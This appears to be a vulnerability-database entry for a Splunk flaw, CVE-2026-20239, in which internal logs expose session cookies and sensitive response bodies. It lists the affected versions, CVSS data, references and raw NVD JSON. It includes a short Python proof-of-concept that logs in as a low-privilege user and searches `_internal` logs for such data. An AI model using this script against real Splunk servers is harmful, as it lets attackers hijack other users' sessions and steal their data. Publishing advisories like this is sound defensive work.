CVE-2026-20239

Description

In Splunk Enterprise versions below 10.2.2 and 10.0.5, and Splunk Cloud Platform versions below 10.3.2512.8, 10.2.2510.11, 10.1.2507.21, and 10.0.2503.13, a user with a role that has access to the `_internal` index could view session cookies and response bodies that contain sensitive data.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Splunk Enterprise < 10.2.2

Splunk Enterprise < 10.0.5

Splunk Cloud Platform < 10.3.2512.8

Splunk Cloud Platform < 10.2.2510.11

Splunk Cloud Platform < 10.1.2507.21

Splunk Cloud Platform < 10.0.2503.13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2026-20239
Demonstrates searching for sensitive data in _internal index.
"""
import requests
import json

# Configuration
SPLUNK_HOST = "https://<target-splunk-host>:8089"
USERNAME = "low_priv_user"
PASSWORD = "user_password"
SEARCH_QUERY = 'search index=_internal (sourcetype="splunkd" OR sourcetype="splunk_web_access") | head 100'

def get_session_key():
    """Authenticate and get session key."""
    url = f"{SPLUNK_HOST}/services/auth/login"
    data = {'username': USERNAME, 'password': PASSWORD, 'output_mode': 'json'}
    # Disable SSL verification for testing purposes only
    response = requests.post(url, data=data, verify=False)
    if response.status_code == 200:
        return response.json().get('sessionKey')
    return None

def search_sensitive_data(session_key):
    """Execute search on _internal index."""
    url = f"{SPLUNK_HOST}/services/search/jobs"
    headers = {'Authorization': f'Splunk {session_key}'}
    data = {'search': SEARCH_QUERY, 'output_mode': 'json'}
    
    response = requests.post(url, headers=headers, data=data, verify=False)
    if response.status_code == 201:
        print("[+] Search job created successfully.")
        # In a real scenario, you would poll for results using the SID
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Failed to create search job: {response.status_code}")

if __name__ == "__main__":
    key = get_session_key()
    if key:
        search_sensitive_data(key)
    else:
        print("[-] Authentication failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20239
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20239
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20239/
[4] VulDB https://vuldb.com/cve/CVE-2026-20239
[5] https://advisory.splunk.com/advisories/SVD-2026-0503

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20239", "sourceIdentifier": "[email protected]", "published": "2026-05-20T18:16:26.520", "lastModified": "2026-05-20T18:16:26.520", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise versions below 10.2.2 and 10.0.5, and Splunk Cloud Platform versions below 10.3.2512.8, 10.2.2510.11, 10.1.2507.21, and 10.0.2503.13, a user with a role that has access to the `_internal` index could view session cookies and response bodies that contain sensitive data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2026-0503", "source": "[email protected]"}]}}